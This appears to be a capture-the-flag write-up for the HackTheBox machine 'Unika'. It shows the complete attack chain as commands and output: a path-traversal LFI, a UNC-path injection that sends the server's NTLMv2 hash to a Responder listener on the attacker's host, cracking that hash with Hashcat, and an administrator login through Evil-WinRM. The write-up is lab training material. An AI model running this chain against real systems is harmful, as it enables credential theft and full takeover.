~/writeups/Unika
Easy Windows LFI
Unika.
Easy Windows LFI NTLMv2 Hashcat HTB Starting Point
Beginner-friendly Windows machine teaching LFI via path traversal, UNC path injection to capture NTLMv2 hashes through Responder, and cracking with Hashcat to gain administrator access.
User Flag
ea81b7afddxxxxxxxxxxxxxxxxxxxxxx
Root Flag
f408fc0d9axxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance

Start with a full Nmap scan to identify open ports and running services.

nmap
$ nmap -sC -sV -oN unika.txt 10.129.95.234 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Win64) PHP/8.1.1) |_http-title: Unika
finding: port 80 open — Apache with PHP on Windows. Single exposed service, focus on web.
02Web Enumeration

Add the host to /etc/hosts, then browse the site. The URL reveals a page GET parameter that loads language files — classic LFI setup.

hosts + observation
$ echo "10.129.95.234 unika.htb" | sudo tee -a /etc/hosts # URL observed while browsing: http://unika.htb/index.php?page=german.php # => 'page' param loads files — potential LFI
03LFI — Path Traversal

Test the page parameter with path traversal. On Windows we target the hosts file to confirm the vulnerability, then weaponize with a UNC path.

LFI confirm
# confirm LFI — read Windows hosts file http://unika.htb/index.php?page=../../../../windows/system32/drivers/etc/hosts 127.0.0.1 localhost ← file content returned, LFI confirmed! # now trigger UNC path to capture NTLMv2 hash http://unika.htb/index.php?page=\\10.10.14.22\share\x
why UNC? Windows authenticates automatically when resolving \\IP\share paths — it sends NTLMv2 credentials. Responder intercepts this.
04NTLMv2 Capture

Start Responder on tun0 before triggering the UNC request. It will intercept the authentication and save the hash.

responder
# terminal 1 — listener $ sudo responder -I tun0 # terminal 2 — trigger via curl $ curl "http://unika.htb/index.php?page=\\\\10.10.14.22\\share\\x" # responder output: [SMB] NTLMv2 Hash : administrator::UNIKA:4e6d35...(truncated) Saved to: /usr/share/responder/logs/SMB-NTLMv2-SSP-10.129.95.234.txt
captured: NTLMv2 hash for administrator. Copy the full hash line to a file.
05Hash Cracking

NTLMv2 = mode 5600 in Hashcat. Rockyou cracks this instantly.

hashcat -m 5600
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt Status: Cracked ADMINISTRATOR::UNIKA:... : badminton
creds: administrator : badminton
06Access & Flags

Log in with Evil-WinRM. We land directly as Administrator.

evil-winrm
$ evil-winrm -i 10.129.95.234 -u administrator -p badminton *Evil-WinRM* PS C:\Users\Administrator> *EWR* type C:\Users\mike\Desktop\flag.txt ea81b7afddxxxxxxxxxxxxxxxxxxxxxx *EWR* type C:\Users\Administrator\Desktop\flag.txt f408fc0d9axxxxxxxxxxxxxxxxxxxxxx
chain: nmap → LFI discovery → UNC path → Responder → hashcat → evil-winrm admin shell
← all writeups TheToppers →